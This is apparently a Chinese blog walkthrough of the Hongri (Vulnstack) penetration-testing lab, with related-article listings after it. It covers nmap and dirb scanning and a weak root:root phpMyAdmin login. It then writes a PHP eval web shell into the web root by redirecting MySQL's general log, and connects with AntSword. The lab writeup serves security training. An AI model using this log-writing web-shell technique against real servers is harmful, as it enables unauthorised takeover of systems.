【渗透测试】-红日靶场-获取web服务器权限

最新推荐文章于 2024-12-12 10:31:12 发布
最新推荐文章于 2024-12-12 10:31:12 发布
阅读量635 收藏 7
点赞数 10
文章标签: 服务器 网络 运维 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_65311462/article/details/143104622
版权

拓扑图:

前置环境配置:

Win 7

默认密码:hongrisec@201

内网ip:192.168.52.143

打开虚拟网络编辑器

添加网络->VMent1->仅主机模式->子网ip:192.168.145.0

添加网卡:

虚拟机->设置-> 添加->网络适配器

保存,打开win 7并重启:

查看ip地址:

外网ip: Ip:192.168.145.129

内网ip: Ip:192.168.52.143

进入C:\phpstudy,启动

渗透测试:

方法一:phpadmin

打开kali,ip:192.168.145.128

存活主机探测

命令:nmap -sn  192.168.145.0/24

全端口扫描

命令:nmap -A -p 1-65535 192.168.145.129

80端口->  开放  http服务

3306端口->开放 mysql服务

目录扫描

命令:dirb http://192.168.145.129

http://192.168.145.129/phpmyadmin/ 

登录验证:

192.168.145.129:80

泄露:

路径:C:/phpStudy/WWW

使用弱口令进行数据库连接:

root:root

http://192.168.145.129/phpmyadmin/ 

登录->sql。

第一步 查询日志 命令: show variables like '%general%';

发现日志写入系统关闭,需要打开。

命令: set global general_log='on';     

开启成功。

在C:/phpStudy/WWW/2.php路径下写入一句话木马:

set global general_log_file = 'C:/phpStudy/WWW/2.php'

select '<?php @eval($_POST["cmd"]);?>'     

验证:http://192.168.145.129/2.php

使用中国蚁剑连接成功。

拿到服务器主机权限。

win10搭建hmailserver邮件服务器(hmailserver+phpstudy+roundcube)
ljh_mm的博客
06-15 1万+
环境安装:Mysql+hmailserver+phpstudy+roundcube。
Hmailserver+webmail搭建邮件服务器
sinat_17754263的博客
05-26 6393
在安装Hmailserver前先安装Apache、php、mysql,可以安装xampp集合解决。XAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建站集成软件包。 Hmail:https://www.hmailserver.com/download Xampp:https://www.apachefriends.org/zh_cn/download.html 安装Hmail 使用Mysql 继续点击下一步,直到出现数据库设置步骤 创建一个新的邮件服务器数据库 .
webman-php/admin 项目常见问题解决方案
gitblog_00148的博客
12-12 383
webman-php/admin 项目常见问题解决方案 admin admin plugin for webman 项目地址: https://gitcode.com/gh_mirrors/admin6/admin ...
phpweb admin.php,phpweb完美解密版
weixin_34562922的博客
03-12 719
压缩包 : defa399af1a11487e9de695c2eecc9.zip 列表shop/shop/admin/shop/admin/brand.phpshop/admin/brand_relcat.phpshop/admin/brandadd.phpshop/admin/brandmodify.phpshop/admin/config.phpshop/admin/css/shop/admi...
hMailServer安装配置
王者的博客
10-27 5348
hMailServer安装配置 使用宝塔面板上的宝塔邮件服务器2.1版本,进行安装hMailServer。 宝塔在安装hMailServer是有做了一些配置,如果是手工安装需要注意一下配置点: 1、\hMailServer\Bin 目录下增加mysql连接文件libmysql.dll,要去下载32位的。 libmysql.dll下载 链接:https://pan.baidu.com/s/1YGJXzjowlJ9n_MiqB4xiqw 提取码:wz90 2、 需要提前安装mysql,并创建hM.
渗透测试-红日靶场
konglong12311的博客
05-23 2036
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
渗透测试-红日靶场
konglong12311的博客
05-24 1253
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
渗透测试-红日靶场
konglong12311的博客
05-22 2024
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
渗透测试-红日靶场
konglong12311的博客
05-29 1466
小编的文章仅学习使用,同时记录小编的学习笔记;如有错漏恳请大神指点,如遇问题可在评论区交流;切勿用于非法行为。
红日靶场渗透测试——红日靶场1(详细笔记)
qq_52849046的博客
05-24 1万+
这篇博客是为小编自己学习记录的同时,分享出来让大神们共同检阅,如有问题,还请各位大神在评论区多多指点。ps:此文章仅学习使用,切勿用于实战,容易被gangan
phpwebadmin_v1.6.zip
05-31
PHP网站后台系统,基于layui+cmlphp开发基础后台管理系统,提供用户权限管理、日志管理等基础模块。登录插件化。提供FormBuildServer和GridBuildServer。通过后端生成form表单及列表页面
phpweb密码初始化为admin
08-10
phpweb 密码 初始化为 admin
Windows邮件服务器hMailServer,网页管理平台WEBADMIN搭建
ajv66295的博客
05-29 1293
//实现:搭建网页管理平台WEBADMIN,通过网页管理hMailServer //环境: Windows Server 2008 R2 IIS PHP Mysql WEBADMIN //前置环境配置: 1、Windows下搭建IIS+php环境 2、Windows下安装mysql //【服务器管理器】--【角色】--...
phpadmin的安装与使用
热门推荐
平凡
02-27 1万+
有Appache,mysql,和php,但是在我们管了数据库的时候,还是有个图形界面比较方便,所以我们自己安装phpmyadmin好了,安装很简单的。   phpMyAdmin是一种MySQL的管理工具,它直接从web上去管理MySQL。   假设你的web(网页存放)根目录是 /var/www/ 假设你的主机web访问是这样的 http://192.168.1.11/   你可以把他安装到
phpadmin管理系统
qq_70836100的博客
08-04 1089
set global general_log_file = 'C:/phpStudy/PHPTutorial/WWW/mafa.php' //修 改⽇志的保存位置。
内网渗透—红日靶场
weixin_54626591的博客
01-18 105
内网渗透—红日靶场
红日靶场vulnstack (三)
2301_76227305的博客
09-03 1407
这个靶场比前面两个要难一点点,主要是思路问题,比如前面的蚁剑发现的mysql文件,你要想得去尝试ssh连接,还有smb爆破取决于你的字典大小。其实在渗透过程中,我有尝试让主机上线CS方便横移,但是均失败了,可能是因为跳板机是Linux,上线的Windows主机都是个黑框。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
红日安全靶场3
weixin_48169878的博客
07-13 4448
环境准备 1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24,外网网段为dhcp,不需要更改2、修改VMnet2的ip为192.168.93.0网段,没有就创建。因为校园网问题,桥接模式无法上网,为了方便,外网网卡改为net模式,并配置192.168.1.0网段,如下所示:修改kail的ip以及dns扫出来......
PHPAdmin的安装和配置
房子
03-13 9327
其实phpadmin就是一个产品,用于管理mysql数据库的,毕竟很多数据库服务器不能够公开连接,所以只能够使用http的方式来进行连接管理。下载phpadmin( http://xj-http.skycn.net:8181/down/phpMyAdmin-2.6.1-rc2.zip)解压到apache能够访问的一个目录中(首先apache和php已经集成好了,能够浏览php页面)。运行访
红日内网渗透靶场搭建
最新发布
02-21
### 构建红队内网渗透测试靶场环境 #### 选择合适的虚拟化平台 为了构建一个安全可控的实验环境,建议使用 VMware Workstation 或 VirtualBox 这样的桌面级虚拟化软件来创建多个虚拟机实例。这些工具允许灵活配置网络模式并支持快照功能以便快速恢复初始状态[^2]。 #### 设计合理的网络拓扑结构 通常会模拟企业内部常见的分层架构,包括但不限于 DMZ 区域、办公区以及核心服务区等不同逻辑分区。通过设置不同的子网划分各个区域,并利用路由器连接起来形成完整的局域网体系。 #### 部署典型的服务端应用 安装 Windows Server 和 Linux 发行版作为服务器操作系统,在其上架设 Web 应用程序(如 IIS/Apache)、数据库管理系统(MySQL/SQLServer)以及其他可能成为攻击目标的企业级服务组件。确保版本老旧存在已知漏洞以增加实战训练价值。 #### 搭建必要的客户端设备 除了上述提到的服务端节点外,还需要准备若干台运行着日常业务操作系统的客户终端,比如 Windows 7/10 工作站或是 Mac OS X 笔记本电脑。它们可以用来发起恶意流量或者充当被控制主机的角色参与演练过程。 #### 安全防护措施部署 尽管这是一个受控环境中进行的安全研究活动,但仍需遵循最小权限原则仅授予必要访问权给参与者;同时开启防火墙规则限制外部未授权接入尝试;定期备份重要数据文件以防意外丢失造成不可挽回损失。 ```bash # 创建一个新的虚拟网络接口用于隔离测试环境 vboxmanage hostonlyif create # 设置静态IP地址范围供后续分配给各VM使用 vboxmanage dhcpserver add --netname HostInterfaceOnlyNetwork \ --ip 192.168.56.1 --netmask 255.255.255.0 --lowerip 192.168.56.100 \ --upperip 192.168.56.200 --enable ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值